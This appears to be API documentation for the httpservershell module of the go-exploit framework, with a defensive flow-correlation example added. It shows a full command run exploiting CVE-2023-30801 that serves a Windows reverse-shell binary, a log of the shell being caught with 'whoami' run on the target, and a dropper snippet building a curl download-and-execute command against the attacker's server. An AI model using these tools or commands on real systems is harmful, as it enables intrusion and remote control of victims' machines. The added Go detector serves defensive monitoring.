Documentation
Overview
httpservershell is (literally) a combination of HTTPServeFile and (SSLShell || SimpleShellServer). The use case is when you want to drop/execute a custom binary, but you still want to catch it in go-exploit. Example usage:
    albinolobster@mournland:~/initial-access/feed/cve-2023-30801$ ./build/cve-2023-30801_linux-arm64 -e -rhost 10.9.49.133 -lhost 10.9.49.134 -lport 1270 -httpServeFile.BindAddr 10.9.49.134 -httpServeShell.SSLShell=false -httpServeFile.FilesToServe ./build/reverse_shell_windows-amd64.exe -httpServeFile.TLS=true
    time=2023-09-08T11:07:20.852-04:00 level=STATUS msg="Loading the provided file: ./build/reverse_shell_windows-amd64.exe"
    time=2023-09-08T11:07:20.856-04:00 level=STATUS msg="Certificate not provided. Generating a TLS Certificate"
    time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting listener on 10.9.49.134:1270"
    time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting target" index=0 host=10.9.49.133 port=8080 ssl=false "ssl auto"=false
    time=2023-09-08T11:07:21.010-04:00 level=STATUS msg="Starting an HTTPS server on 10.9.49.134:8080"
    time=2023-09-08T11:07:21.092-04:00 level=STATUS msg="Using session: SID=rIOk9SAl5TXTqIfpVGmYUn/kB+VuMrqo"
    time=2023-09-08T11:07:21.095-04:00 level=STATUS msg="Selecting a Windows payload"
    time=2023-09-08T11:07:21.309-04:00 level=SUCCESS msg="Caught new shell from 10.9.49.133:51706"
    time=2023-09-08T11:07:21.309-04:00 level=STATUS msg="Active shell from 10.9.49.133:51706"
    time=2023-09-08T11:07:23.180-04:00 level=STATUS msg="Exploit successfully completed"
    whoami
    albinolobst9bd8\albinolobster
From the exploit code, interacting with the variables isn't too much different from using httpServeFile (since httpServeShell is just a wrapper):
    downAndExec := dropper.Windows.CurlHTTP(
        httpservefile.GetInstance().HTTPAddr,
        httpservefile.GetInstance().HTTPPort,
        httpservefile.GetInstance().TLS,
        httpservefile.GetInstance().GetRandomName(windows64))
Which means anything that supports httpServeShell should also trivially support httpServeFile (and the other way around as long as you are accounting for httpServeFile.SSLShell).
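Seen from the target's network, the sample run above produces two outbound connections from 10.9.49.133 to the same host within a fraction of a second: the HTTPS fetch on port 8080 and the shell on port 1270. The following is an added detection example, not part of go-exploit, that correlates such pairs in flow records; the Flow schema, the function names and the record timings are assumptions constructed around the addresses in that log.

```go
package main

import (
	"fmt"
	"time"
)

// Flow is one outbound connection record (hypothetical minimal schema).
type Flow struct {
	Start    time.Time
	Src, Dst string
	DstPort  int
}

// Finding pairs two connections from one source to one peer on different ports.
type Finding struct {
	Src, Dst            string
	FirstPort, NextPort int
	Gap                 time.Duration
}

// CorrelateCallbacks expects flows sorted by Start. It is a heuristic, not a
// signature: it reports a host reaching the same peer on two ports within window.
func CorrelateCallbacks(flows []Flow, window time.Duration) []Finding {
	var out []Finding
	for i, a := range flows {
		for _, b := range flows[i+1:] {
			gap := b.Start.Sub(a.Start)
			if gap > window {
				break // sorted input: every later flow is outside the window too
			}
			if a.Src == b.Src && a.Dst == b.Dst && a.DstPort != b.DstPort {
				out = append(out, Finding{a.Src, a.Dst, a.DstPort, b.DstPort, gap})
			}
		}
	}
	return out
}

// SampleFlows returns constructed records; only addresses and ports come from the sample run.
func SampleFlows() []Flow {
	t0 := time.Date(2023, 9, 8, 11, 7, 21, 0, time.UTC)
	return []Flow{
		{t0, "10.9.49.133", "10.9.49.134", 8080},                             // payload fetch
		{t0.Add(150 * time.Millisecond), "10.9.49.200", "10.9.49.134", 8080}, // other client
		{t0.Add(209 * time.Millisecond), "10.9.49.133", "10.9.49.134", 1270}, // callback
	}
}

func main() {
	fmt.Println(CorrelateCallbacks(SampleFlows(), 5*time.Second))
}
```

Because httpServeFile.TLS=true hides the download from content inspection, the correlation works on connection metadata only and will also match benign multi-port services, so treat findings as leads to triage.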
Index
Constants
This section is empty.
Variables
This section is empty.
Functions
This section is empty.
Types
type Server

    type Server struct {
        // Indicates if we should use SSLShell or SimpleShell
        SSLShell bool
        // The HTTP address to bind to
        HTTPAddr string
        // The HTTP port to bind to
        HTTPPort int
    }

func (*Server) CreateFlags

    func (serveShell *Server) CreateFlags()

User options for serving a file over HTTP as the "c2".